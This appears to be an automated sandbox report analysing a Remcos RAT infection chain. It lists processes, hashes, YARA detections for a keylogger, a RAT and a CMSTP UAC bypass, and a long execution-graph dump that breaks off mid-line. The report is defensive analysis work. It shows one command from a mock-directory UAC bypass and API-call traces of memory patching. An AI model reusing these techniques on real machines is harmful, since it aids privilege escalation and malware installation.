                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:20
                                                                                                                      Start time:05:05:00
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:23
                                                                                                                      Start time:05:05:05
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Dlaybpxl.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Dlaybpxl.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'285'120 bytes
                                                                                                                      MD5 hash:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:24
                                                                                                                      Start time:05:05:06
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                                      Imagebase:0x440000
                                                                                                                      File size:86'528 bytes
                                                                                                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:6.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:4.3%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:21
                                                                                                                        execution_graph 72229 2d57074 73050 2d34860 72229->73050 73051 2d34871 73050->73051 73052 2d34897 73051->73052 73053 2d348ae 73051->73053 73059 2d34bcc 73052->73059 73068 2d345a0 73053->73068 73056 2d348a4 73057 2d348df 73056->73057 73073 2d34530 73056->73073 73060 2d34bd9 73059->73060 73067 2d34c09 73059->73067 73061 2d34c02 73060->73061 73063 2d34be5 73060->73063 73064 2d345a0 11 API calls 73061->73064 73079 2d32c44 11 API calls 73063->73079 73064->73067 73065 2d34bf3 73065->73056 73080 2d344dc 73067->73080 73069 2d345a4 73068->73069 73070 2d345c8 73068->73070 73085 2d32c10 11 API calls 73069->73085 73070->73056 73072 2d345b1 73072->73056 73074 2d34534 73073->73074 73077 2d34544 73073->73077 73076 2d345a0 11 API calls 73074->73076 73074->73077 73075 2d34572 73075->73057 73076->73077 73077->73075 73086 2d32c2c 11 API calls 73077->73086 73079->73065 73081 2d344e2 73080->73081 73082 2d344fd 73080->73082 73081->73082 73084 2d32c2c 11 API calls 73081->73084 73082->73065 73084->73082 73085->73072 73086->73075 73087 2d5c350 73090 2d4f7c8 73087->73090 73091 2d4f7d0 73090->73091 73091->73091 73092 2d4f7d7 73091->73092 75495 2d488b8 LoadLibraryW 73092->75495 73094 2d4f7f1 75500 2d32ee0 QueryPerformanceCounter 73094->75500 73096 2d4f7f6 73097 2d4f800 InetIsOffline 73096->73097 73098 2d4f80a 73097->73098 73099 2d4f81b 73097->73099 73100 2d34530 11 API calls 73098->73100 73101 2d34530 11 API calls 73099->73101 73102 2d4f819 73100->73102 73101->73102 73103 2d34860 11 API calls 73102->73103 73104 2d4f848 73103->73104 73105 2d4f850 73104->73105 73106 2d4f85a 73105->73106 75503 2d347ec 73106->75503 73108 2d4f873 73109 2d4f87b 73108->73109 73110 2d4f885 73109->73110 75518 2d489d0 73110->75518 73113 2d34860 11 API calls 73114 2d4f8ac 73113->73114 73115 2d4f8b4 73114->73115 75531 2d346d4 73115->75531 75533 2d48274 75495->75533 75497 2d488f1 75544 2d47d78 75497->75544 75501 2d32ef8 GetTickCount 75500->75501 75502 2d32eed 75500->75502 75501->73096 75502->73096 75504 2d34851 75503->75504 75505 2d347f0 75503->75505 75506 2d34530 75505->75506 75507 2d347f8 75505->75507 75511 2d345a0 11 API calls 75506->75511 75513 2d34544 75506->75513 75507->75504 75508 2d34807 75507->75508 75510 2d34530 11 API calls 75507->75510 75512 2d345a0 11 API calls 75508->75512 75509 2d34572 75509->73108 75510->75508 75511->75513 75515 2d34821 75512->75515 75513->75509 75581 2d32c2c 11 API calls 75513->75581 75516 2d34530 11 API calls 75515->75516 75517 2d3484d 75516->75517 75517->73108 75519 2d489e4 75518->75519 75520 2d481cc 17 API calls 75519->75520 75521 2d48a1d 75520->75521 75522 2d48274 15 API calls 75521->75522 75523 2d48a36 75522->75523 75524 2d47d78 18 API calls 75523->75524 75525 2d48a95 75524->75525 75582 2d48338 75525->75582 75528 2d48abc 75529 2d34500 11 API calls 75528->75529 75530 2d48ac9 75529->75530 75530->73113 75532 2d346da 75531->75532 75534 2d34530 11 API calls 75533->75534 75535 2d48299 75534->75535 75558 2d4798c 75535->75558 75538 2d347ec 11 API calls 75539 2d482b3 75538->75539 75540 2d482bb GetModuleHandleW GetProcAddress GetProcAddress 75539->75540 75541 2d482ee 75540->75541 75564 2d34500 75541->75564 75545 2d34530 11 API calls 75544->75545 75546 2d47d9d 75545->75546 75547 2d4798c 12 API calls 75546->75547 75548 2d47daa 75547->75548 75549 2d347ec 11 API calls 75548->75549 75550 2d47dba 75549->75550 75570 2d481cc 75550->75570 75553 2d48274 15 API calls 75554 2d47dd3 NtWriteVirtualMemory 75553->75554 75555 2d47dff 75554->75555 75556 2d34500 11 API calls 75555->75556 75557 2d47e0c FreeLibrary 75556->75557 75557->73094 75559 2d4799d 75558->75559 75560 2d34bcc 11 API calls 75559->75560 75562 2d479ad 75560->75562 75561 2d47a19 75561->75538 75562->75561 75568 2d3babc CharNextA 75562->75568 75565 2d34506 75564->75565 75566 2d3452c 75565->75566 75569 2d32c2c 11 API calls 75565->75569 75566->75497 75568->75562 75569->75565 75571 2d34530 11 API calls 75570->75571 75572 2d481ef 75571->75572 75573 2d4798c 12 API calls 75572->75573 75574 2d481fc 75573->75574 75575 2d48204 GetModuleHandleA 75574->75575 75576 2d48274 15 API calls 75575->75576 75577 2d48215 GetModuleHandleA 75576->75577 75578 2d48233 75577->75578 75579 2d344dc 11 API calls 75578->75579 75580 2d47dcd 75579->75580 75580->75553 75581->75509 75583 2d34530 11 API calls 75582->75583 75584 2d4835b 75583->75584 75585 2d34860 11 API calls 75584->75585 75586 2d4837a 75585->75586 75587 2d481cc 17 API calls 75586->75587 75588 2d4838d 75587->75588 75589 2d48274 15 API calls 75588->75589 75590 2d48393 FlushInstructionCache 75589->75590 75591 2d483b9 75590->75591 75592 2d344dc 11 API calls 75591->75592 75593 2d483c1 FreeLibrary 75592->75593 75593->75528 75594 2d53e12 75595 2d34860 11 API calls 75594->75595 75596 2d53e33 75595->75596 75597 2d53e4b 75596->75597 75598 2d347ec 11 API calls 75597->75598 75599 2d53e6a 75598->75599 75600 2d53e82 75599->75600 75601 2d489d0 20 API calls 75600->75601 75602 2d53e8e 75601->75602 77140 2d4f094 75602->77140 75605 2d34860 11 API calls 75606 2d53ee0 75605->75606 75607 2d53eeb 75606->75607 75608 2d53ef7 75607->75608 75609 2d34860 11 API calls 75608->75609 75610 2d53f18 75609->75610 75611 2d53f23 75610->75611 75612 2d53f30 75611->75612 75613 2d347ec 11 API calls 75612->75613 75614 2d53f4f 75613->75614 75615 2d53f67 75614->75615 75616 2d489d0 20 API calls 75615->75616 75617 2d53f73 75616->75617 75618 2d34860 11 API calls 75617->75618 75619 2d53f94 75618->75619 75620 2d53f9f 75619->75620 75621 2d53fac 75620->75621 75622 2d347ec 11 API calls 75621->75622 75623 2d53fcb 75622->75623 75624 2d53fe3 75623->75624 75625 2d489d0 20 API calls 75624->75625 75626 2d53fef 75625->75626 75627 2d34860 11 API calls 75626->75627 75628 2d54010 75627->75628 75629 2d5401b 75628->75629 75630 2d54028 75629->75630 75631 2d347ec 11 API calls 75630->75631 75632 2d54047 75631->75632 75633 2d54052 75632->75633 75634 2d5405f 75633->75634 75635 2d489d0 20 API calls 75634->75635 75636 2d5406b 75635->75636 77147 2d4e358 75636->77147 75639 2d54091 75640 2d540a2 75639->75640 77152 2d4dc8c 75640->77152 75643 2d34860 11 API calls 75644 2d540f1 75643->75644 75645 2d540fc 75644->75645 75646 2d347ec 11 API calls 75645->75646 75647 2d54128 75646->75647 75648 2d54133 75647->75648 75649 2d489d0 20 API calls 75648->75649 75650 2d5414c 75649->75650 75651 2d34860 11 API calls 75650->75651 75652 2d5416d 75651->75652 75653 2d347ec 11 API calls 75652->75653 75654 2d541a4 75653->75654 75655 2d541af 75654->75655 75656 2d489d0 20 API calls 75655->75656 75657 2d541c8 75656->75657 75658 2d488b8 20 API calls 75657->75658 75659 2d541cd 75658->75659 75660 2d541d7 75659->75660 77167 2d4e678 75660->77167 75663 2d34860 11 API calls 75664 2d54217 75663->75664 75665 2d5422f 75664->75665 75666 2d347ec 11 API calls 75665->75666 75667 2d5424e 75666->75667 75668 2d54259 75667->75668 75669 2d489d0 20 API calls 75668->75669 75670 2d54272 Sleep 75669->75670 75671 2d34860 11 API calls 75670->75671 75672 2d5429d 75671->75672 75673 2d542b5 75672->75673 75674 2d347ec 11 API calls 75673->75674 75675 2d542d4 75674->75675 75676 2d542df 75675->75676 75677 2d346d4 75676->75677 75678 2d542ec 75677->75678 75679 2d489d0 20 API calls 75678->75679 75680 2d542f8 75679->75680 75681 2d34860 11 API calls 75680->75681 75682 2d54319 75681->75682 77306 2d349a0 75682->77306 75685 2d346d4 75686 2d54331 75685->75686 75687 2d347ec 11 API calls 75686->75687 75688 2d54350 75687->75688 75689 2d5435b 75688->75689 75690 2d346d4 75689->75690 75691 2d54368 75690->75691 75692 2d489d0 20 API calls 75691->75692 75693 2d54374 75692->75693 75694 2d34860 11 API calls 75693->75694 75695 2d54395 75694->75695 75696 2d543a0 75695->75696 75697 2d346d4 75696->75697 75698 2d543ad 75697->75698 75699 2d347ec 11 API calls 75698->75699 75700 2d543cc 75699->75700 75701 2d543d7 75700->75701 75702 2d543e4 75701->75702 75703 2d489d0 20 API calls 75702->75703 75704 2d543f0 75703->75704 75705 2d543ff 75704->75705 75706 2d34860 11 API calls 75705->75706 75707 2d54420 75706->75707 75708 2d349a0 75707->75708 75709 2d5442b 75708->75709 75710 2d347ec 11 API calls 75709->75710 75711 2d54457 75710->75711 75712 2d54462 75711->75712 75713 2d5446f 75712->75713 75714 2d489d0 20 API calls 75713->75714 75715 2d5447b 75714->75715 75716 2d34860 11 API calls 75715->75716 75717 2d5449c 75716->75717 75718 2d349a0 75717->75718 75719 2d544a7 75718->75719 75720 2d346d4 75719->75720 75721 2d544b4 75720->75721 75722 2d347ec 11 API calls 75721->75722 75723 2d544d3 75722->75723 75724 2d544de 75723->75724 75725 2d489d0 20 API calls 75724->75725 75726 2d544f7 75725->75726 75727 2d34860 11 API calls 75726->75727 75728 2d54518 75727->75728 75729 2d54523 75728->75729 75730 2d346d4 75729->75730 75731 2d54530 75730->75731 75732 2d347ec 11 API calls 75731->75732 75733 2d5454f 75732->75733 75734 2d349a0 75733->75734 75735 2d5455a 75734->75735 75736 2d489d0 20 API calls 75735->75736 75737 2d54573 75736->75737 75738 2d34860 11 API calls 75737->75738 75739 2d54594 75738->75739 75740 2d347ec 11 API calls 75739->75740 75741 2d545b8 75740->75741 75742 2d545c3 75741->75742 77308 2d4894c LoadLibraryW 75742->77308 75745 2d34860 11 API calls 75746 2d545f1 75745->75746 75747 2d347ec 11 API calls 75746->75747 75748 2d54615 75747->75748 75749 2d349a0 75748->75749 75750 2d54620 75749->75750 75751 2d54626 75750->75751 75752 2d4894c 21 API calls 75751->75752 75753 2d5462d 75752->75753 75754 2d488b8 20 API calls 75753->75754 75755 2d54632 75754->75755 75756 2d34860 11 API calls 75755->75756 75757 2d54653 75756->75757 75758 2d5466b 75757->75758 75759 2d347ec 11 API calls 75758->75759 75760 2d5468a 75759->75760 75761 2d54695 75760->75761 75762 2d546a2 75761->75762 75763 2d489d0 20 API calls 75762->75763 75764 2d546ae 75763->75764 75765 2d34860 11 API calls 75764->75765 75766 2d546cf 75765->75766 75767 2d546e7 75766->75767 75768 2d347ec 11 API calls 75767->75768 75769 2d54706 75768->75769 75770 2d54711 75769->75770 75771 2d5471e 75770->75771 75772 2d489d0 20 API calls 75771->75772 75773 2d5472a 75772->75773 75774 2d34860 11 API calls 75773->75774 75775 2d5474b 75774->75775 75776 2d54763 75775->75776 75777 2d347ec 11 API calls 75776->75777 75778 2d54782 75777->75778 75779 2d5479a 75778->75779 75780 2d489d0 20 API calls 75779->75780 75781 2d547a6 75780->75781 75782 2d4e358 11 API calls 75781->75782 75783 2d547bb 75782->75783 75784 2d547dd 75783->75784 75785 2d547f5 75784->75785 75786 2d4dc8c 17 API calls 75785->75786 75787 2d54801 75786->75787 75788 2d488b8 20 API calls 75787->75788 75789 2d54806 75788->75789 75790 2d4f094 11 API calls 75789->75790 75791 2d54816 75790->75791 75792 2d347ec 11 API calls 75791->75792 75793 2d5482c 75792->75793 75794 2d54843 75793->75794 75795 2d34860 11 API calls 75794->75795 75796 2d54864 75795->75796 75797 2d5486f 75796->75797 75798 2d5487c 75797->75798 75799 2d347ec 11 API calls 75798->75799 75800 2d5489b 75799->75800 75801 2d548a6 75800->75801 75802 2d489d0 20 API calls 75801->75802 75803 2d548bf 75802->75803 75804 2d34860 11 API calls 75803->75804 75805 2d548e0 75804->75805 75806 2d346d4 75805->75806 75807 2d548f8 75806->75807 75808 2d347ec 11 API calls 75807->75808 75809 2d54917 75808->75809 75810 2d54922 75809->75810 75811 2d5492f 75810->75811 75812 2d489d0 20 API calls 75811->75812 75813 2d5493b 75812->75813 75814 2d34860 11 API calls 75813->75814 75815 2d5495c 75814->75815 75816 2d54967 75815->75816 75817 2d347ec 11 API calls 75816->75817 75818 2d54993 75817->75818 75819 2d5499e 75818->75819 75820 2d489d0 20 API calls 75819->75820 75821 2d549b7 75820->75821 75822 2d488b8 20 API calls 75821->75822 75823 2d549bc 75822->75823 75824 2d34860 11 API calls 75823->75824 75825 2d549dd 75824->75825 75826 2d549f5 75825->75826 75827 2d347ec 11 API calls 75826->75827 75828 2d54a14 75827->75828 75829 2d54a1f 75828->75829 75830 2d54a2c 75829->75830 75831 2d489d0 20 API calls 75830->75831 75832 2d54a38 75831->75832 75833 2d34860 11 API calls 75832->75833 75834 2d54a59 75833->75834 75835 2d347ec 11 API calls 75834->75835 75836 2d54a90 75835->75836 75837 2d489d0 20 API calls 75836->75837 75838 2d54ab4 75837->75838 75839 2d34860 11 API calls 75838->75839 75840 2d54ad5 75839->75840 75841 2d54aed 75840->75841 75842 2d347ec 11 API calls 75841->75842 75843 2d54b0c 75842->75843 75844 2d54b24 75843->75844 75845 2d489d0 20 API calls 75844->75845 75846 2d54b30 75845->75846 75847 2d34860 11 API calls 75846->75847 75848 2d54b51 75847->75848 75849 2d54b5c 75848->75849 75850 2d347ec 11 API calls 75849->75850 75851 2d54b88 75850->75851 75852 2d54b93 75851->75852 75853 2d489d0 20 API calls 75852->75853 75854 2d54bac 75853->75854 75855 2d488b8 20 API calls 75854->75855 75856 2d54bb1 75855->75856 75857 2d4e358 11 API calls 75856->75857 75858 2d54bc6 75857->75858 75859 2d54be8 75858->75859 75860 2d54c00 75859->75860 75861 2d4dc8c 17 API calls 75860->75861 75862 2d54c0c 75861->75862 75863 2d34860 11 API calls 75862->75863 75864 2d54c2d 75863->75864 75865 2d54c38 75864->75865 75866 2d54c45 75865->75866 75867 2d347ec 11 API calls 75866->75867 75868 2d54c64 75867->75868 75869 2d54c6f 75868->75869 75870 2d54c7c 75869->75870 75871 2d489d0 20 API calls 75870->75871 75872 2d54c88 75871->75872 75873 2d34860 11 API calls 75872->75873 75874 2d54ca9 75873->75874 75875 2d54cb4 75874->75875 75876 2d54cc1 75875->75876 75877 2d347ec 11 API calls 75876->75877 75878 2d54ce0 75877->75878 75879 2d54ceb 75878->75879 75880 2d54cf8 75879->75880 75881 2d489d0 20 API calls 75880->75881 75882 2d54d04 75881->75882 75883 2d34860 11 API calls 75882->75883 75884 2d54d25 75883->75884 75885 2d54d30 75884->75885 75886 2d54d3d 75885->75886 75887 2d347ec 11 API calls 75886->75887 75888 2d54d5c 75887->75888 75889 2d54d67 75888->75889 75890 2d54d74 75889->75890 75891 2d489d0 20 API calls 75890->75891 75892 2d54d80 75891->75892 75893 2d34860 11 API calls 75892->75893 75894 2d54da1 75893->75894 75895 2d54dac 75894->75895 75896 2d54db9 75895->75896 75897 2d347ec 11 API calls 75896->75897 75898 2d54dd8 75897->75898 75899 2d54df0 75898->75899 75900 2d489d0 20 API calls 75899->75900 75901 2d54dfc 75900->75901 75902 2d34860 11 API calls 75901->75902 75903 2d54e1d 75902->75903 75904 2d54e28 75903->75904 75905 2d54e35 75904->75905 75906 2d347ec 11 API calls 75905->75906 75907 2d54e54 75906->75907 75908 2d54e5f 75907->75908 75909 2d54e6c 75908->75909 75910 2d489d0 20 API calls 75909->75910 75911 2d54e78 75910->75911 75912 2d34860 11 API calls 75911->75912 75913 2d54e99 75912->75913 75914 2d54ea4 75913->75914 75915 2d54eb1 75914->75915 75916 2d347ec 11 API calls 75915->75916 75917 2d54ed0 75916->75917 75918 2d54edb 75917->75918 75919 2d54ee8 75918->75919 75920 2d489d0 20 API calls 75919->75920 75921 2d54ef4 75920->75921 75922 2d34860 11 API calls 75921->75922 75923 2d54f15 75922->75923 75924 2d54f20 75923->75924 75925 2d54f2d 75924->75925 75926 2d347ec 11 API calls 75925->75926 75927 2d54f4c 75926->75927 75928 2d489d0 20 API calls 75927->75928 75929 2d54f70 75928->75929 75930 2d34860 11 API calls 75929->75930 75931 2d54f91 75930->75931 75932 2d54fa9 75931->75932 75933 2d347ec 11 API calls 75932->75933 75934 2d54fc8 75933->75934 75935 2d54fe0 75934->75935 75936 2d489d0 20 API calls 75935->75936 75937 2d54fec 75936->75937 75938 2d488b8 20 API calls 75937->75938 75939 2d54ff1 75938->75939 75940 2d34860 11 API calls 75939->75940 75941 2d55012 75940->75941 75942 2d347ec 11 API calls 75941->75942 75943 2d55049 75942->75943 75944 2d489d0 20 API calls 75943->75944 75945 2d5506d 75944->75945 75946 2d34860 11 API calls 75945->75946 75947 2d5508e 75946->75947 75948 2d550a6 75947->75948 75949 2d347ec 11 API calls 75948->75949 75950 2d550c5 75949->75950 75951 2d550dd 75950->75951 75952 2d489d0 20 API calls 75951->75952 75953 2d550e9 Sleep 75952->75953 75954 2d34860 11 API calls 75953->75954 75955 2d55114 75954->75955 75956 2d5511f 75955->75956 75957 2d5512c 75956->75957 75958 2d347ec 11 API calls 75957->75958 75959 2d5514b 75958->75959 75960 2d55163 75959->75960 75961 2d489d0 20 API calls 75960->75961 75962 2d5516f 75961->75962 75963 2d34860 11 API calls 75962->75963 75964 2d55190 75963->75964 75965 2d5519b 75964->75965 75966 2d551a8 75965->75966 75967 2d347ec 11 API calls 75966->75967 75968 2d551c7 75967->75968 75969 2d551df 75968->75969 75970 2d489d0 20 API calls 75969->75970 75971 2d551eb 75970->75971 75972 2d34860 11 API calls 75971->75972 75973 2d5520c 75972->75973 75974 2d55217 75973->75974 75975 2d55224 75974->75975 75976 2d347ec 11 API calls 75975->75976 75977 2d55243 75976->75977 75978 2d5525b 75977->75978 75979 2d489d0 20 API calls 75978->75979 75980 2d55267 75979->75980 75981 2d5527e 75980->75981 77315 2d4dc04 75981->77315 75983 2d55289 75984 2d552a0 75983->75984 75985 2d4dc04 5 API calls 75984->75985 75986 2d552ab 75985->75986 75987 2d552c2 75986->75987 75988 2d4dc04 5 API calls 75987->75988 75989 2d552cd 75988->75989 75990 2d552e4 75989->75990 75991 2d4dc04 5 API calls 75990->75991 75992 2d552ef 75991->75992 75993 2d34860 11 API calls 75992->75993 75994 2d55310 75993->75994 75995 2d5531b 75994->75995 75996 2d347ec 11 API calls 75995->75996 75997 2d55347 75996->75997 75998 2d55352 75997->75998 75999 2d489d0 20 API calls 75998->75999 76000 2d5536b 75999->76000 76001 2d34860 11 API calls 76000->76001 76002 2d5538c 76001->76002 76003 2d347ec 11 API calls 76002->76003 76004 2d553c3 76003->76004 76005 2d489d0 20 API calls 76004->76005 76006 2d553e7 76005->76006 76007 2d34860 11 API calls 76006->76007 76008 2d55408 76007->76008 76009 2d55420 76008->76009 76010 2d347ec 11 API calls 76009->76010 76011 2d5543f 76010->76011 76012 2d55457 76011->76012 76013 2d489d0 20 API calls 76012->76013 76014 2d55463 76013->76014 76015 2d34860 11 API calls 76014->76015 76016 2d55484 76015->76016 76017 2d5548f 76016->76017 76018 2d347ec 11 API calls 76017->76018 76019 2d554bb 76018->76019 76020 2d554c6 76019->76020 76021 2d489d0 20 API calls 76020->76021 76022 2d554df 76021->76022 76023 2d554ef 76022->76023 76024 2d4dc04 5 API calls 76023->76024 76025 2d554fa 76024->76025 76026 2d4dc04 5 API calls 76025->76026 76027 2d55515 76026->76027 76028 2d55530 76027->76028 76029 2d4dc04 5 API calls 76027->76029 76030 2d34860 11 API calls 76028->76030 76029->76028 76031 2d55551 76030->76031 76032 2d5555c 76031->76032 76033 2d347ec 11 API calls 76032->76033 76034 2d55588 76033->76034 76035 2d55593 76034->76035 76036 2d489d0 20 API calls 76035->76036 76037 2d555ac 76036->76037 76038 2d34860 11 API calls 76037->76038 76039 2d555cd 76038->76039 76040 2d347ec 11 API calls 76039->76040 76041 2d55604 76040->76041 76042 2d489d0 20 API calls 76041->76042 76043 2d55628 76042->76043 76044 2d34860 11 API calls 76043->76044 76045 2d55649 76044->76045 76046 2d55654 76045->76046 76047 2d55661 76046->76047 76048 2d347ec 11 API calls 76047->76048 76049 2d55680 76048->76049 76050 2d55698 76049->76050 76051 2d489d0 20 API calls 76050->76051 76052 2d556a4 76051->76052 76053 2d34860 11 API calls 76052->76053 76054 2d556c5 76053->76054 76055 2d556d0 76054->76055 76056 2d556dd 76055->76056 76057 2d347ec 11 API calls 76056->76057 76058 2d556fc 76057->76058 76059 2d55714 76058->76059 76060 2d489d0 20 API calls 76059->76060 76061 2d55720 76060->76061 77326 2d4e398 76061->77326 76064 2d34530 11 API calls 76065 2d55746 76064->76065 76066 2d34860 11 API calls 76065->76066 76067 2d55767 76066->76067 76068 2d347ec 11 API calls 76067->76068 76069 2d5579e 76068->76069 76070 2d489d0 20 API calls 76069->76070 76071 2d557c2 76070->76071 76072 2d34860 11 API calls 76071->76072 76073 2d557e3 76072->76073 76074 2d347ec 11 API calls 76073->76074 76075 2d5581a 76074->76075 76076 2d489d0 20 API calls 76075->76076 76077 2d5583e 76076->76077 77339 2d37acc 76077->77339 76082 2d34530 11 API calls 76083 2d5586a 76082->76083 76084 2d34860 11 API calls 76083->76084 76085 2d5588b 76084->76085 76086 2d347ec 11 API calls 76085->76086 76087 2d558c2 76086->76087 76088 2d489d0 20 API calls 76087->76088 76089 2d558e6 76088->76089 76090 2d34860 11 API calls 76089->76090 76091 2d55907 76090->76091 76092 2d347ec 11 API calls 76091->76092 76093 2d5593e 76092->76093 76094 2d489d0 20 API calls 76093->76094 76095 2d55962 76094->76095 76096 2d34860 11 API calls 76095->76096 76097 2d55983 76096->76097 76098 2d347ec 11 API calls 76097->76098 76099 2d559ba 76098->76099 76100 2d489d0 20 API calls 76099->76100 76101 2d559de 76100->76101 76102 2d34860 11 API calls 76101->76102 76103 2d559ff 76102->76103 76104 2d347ec 11 API calls 76103->76104 76105 2d55a36 76104->76105 76106 2d489d0 20 API calls 76105->76106 76107 2d55a5a 76106->76107 76108 2d4f094 11 API calls 76107->76108 76109 2d55a6a 76108->76109 77352 2d4f108 76109->77352 76112 2d34530 11 API calls 76113 2d55a8b 76112->76113 76114 2d34860 11 API calls 76113->76114 76115 2d55aac 76114->76115 76116 2d347ec 11 API calls 76115->76116 76117 2d55ae3 76116->76117 76118 2d489d0 20 API calls 76117->76118 76119 2d55b07 76118->76119 76120 2d34860 11 API calls 76119->76120 76121 2d55b28 76120->76121 76122 2d347ec 11 API calls 76121->76122 76123 2d55b5f 76122->76123 76124 2d489d0 20 API calls 76123->76124 76125 2d55b83 76124->76125 76126 2d34860 11 API calls 76125->76126 76127 2d55ba4 76126->76127 76128 2d347ec 11 API calls 76127->76128 76129 2d55bdb 76128->76129 76130 2d489d0 20 API calls 76129->76130 76131 2d55bff 76130->76131 76132 2d34860 11 API calls 76131->76132 76133 2d55c20 76132->76133 76134 2d347ec 11 API calls 76133->76134 76135 2d55c57 76134->76135 76136 2d489d0 20 API calls 76135->76136 76137 2d55c7b 76136->76137 76138 2d34860 11 API calls 76137->76138 76139 2d55c9c 76138->76139 76140 2d347ec 11 API calls 76139->76140 76141 2d55cd3 76140->76141 76142 2d489d0 20 API calls 76141->76142 76143 2d55cf7 76142->76143 76144 2d34860 11 API calls 76143->76144 76145 2d55d18 76144->76145 76146 2d347ec 11 API calls 76145->76146 76147 2d55d4f 76146->76147 76148 2d489d0 20 API calls 76147->76148 76150 2d55d73 76148->76150 76149 2d57568 76152 2d34860 11 API calls 76149->76152 76150->76149 76151 2d34860 11 API calls 76150->76151 76153 2d55da8 76151->76153 76154 2d57589 76152->76154 77357 2d37e5c 76153->77357 76156 2d347ec 11 API calls 76154->76156 76160 2d575c0 76156->76160 76158 2d55dd3 76159 2d34860 11 API calls 76158->76159 76163 2d55df4 76159->76163 76161 2d489d0 20 API calls 76160->76161 76162 2d575e4 76161->76162 76164 2d34860 11 API calls 76162->76164 76165 2d347ec 11 API calls 76163->76165 76166 2d57605 76164->76166 76167 2d55e2b 76165->76167 76168 2d347ec 11 API calls 76166->76168 76169 2d489d0 20 API calls 76167->76169 76172 2d5763c 76168->76172 76170 2d55e4f 76169->76170 76171 2d34860 11 API calls 76170->76171 76175 2d55e70 76171->76175 76173 2d489d0 20 API calls 76172->76173 76174 2d57660 76173->76174 76176 2d34860 11 API calls 76174->76176 76177 2d347ec 11 API calls 76175->76177 76178 2d57681 76176->76178 76179 2d55ea7 76177->76179 76180 2d347ec 11 API calls 76178->76180 76181 2d489d0 20 API calls 76179->76181 76184 2d576b8 76180->76184 76182 2d55ecb 76181->76182 76183 2d34860 11 API calls 76182->76183 76187 2d55eec 76183->76187 76185 2d489d0 20 API calls 76184->76185 76186 2d576dc 76185->76186 76188 2d34860 11 API calls 76186->76188 76189 2d347ec 11 API calls 76187->76189 76190 2d576fd 76188->76190 76191 2d55f23 76189->76191 76192 2d347ec 11 API calls 76190->76192 76193 2d489d0 20 API calls 76191->76193 76196 2d57734 76192->76196 76194 2d55f47 76193->76194 76195 2d34860 11 API calls 76194->76195 76198 2d55f68 76195->76198 76197 2d489d0 20 API calls 76196->76197 76199 2d57758 76197->76199 76201 2d34860 11 API calls 76198->76201 76200 2d34860 11 API calls 76199->76200 76202 2d57779 76200->76202 76203 2d55fa0 76201->76203 76204 2d347ec 11 API calls 76202->76204 76205 2d347ec 11 API calls 76203->76205 76206 2d577b0 76204->76206 76207 2d55fd7 76205->76207 76208 2d489d0 20 API calls 76206->76208 76209 2d489d0 20 API calls 76207->76209 76210 2d577d4 76208->76210 76211 2d55ffb 76209->76211 76213 2d577e9 76210->76213 76214 2d58318 76210->76214 76212 2d34860 11 API calls 76211->76212 76217 2d5601c 76212->76217 76215 2d34860 11 API calls 76213->76215 76216 2d34860 11 API calls 76214->76216 76219 2d5780a 76215->76219 76218 2d58339 76216->76218 76220 2d347ec 11 API calls 76217->76220 76221 2d347ec 11 API calls 76218->76221 76222 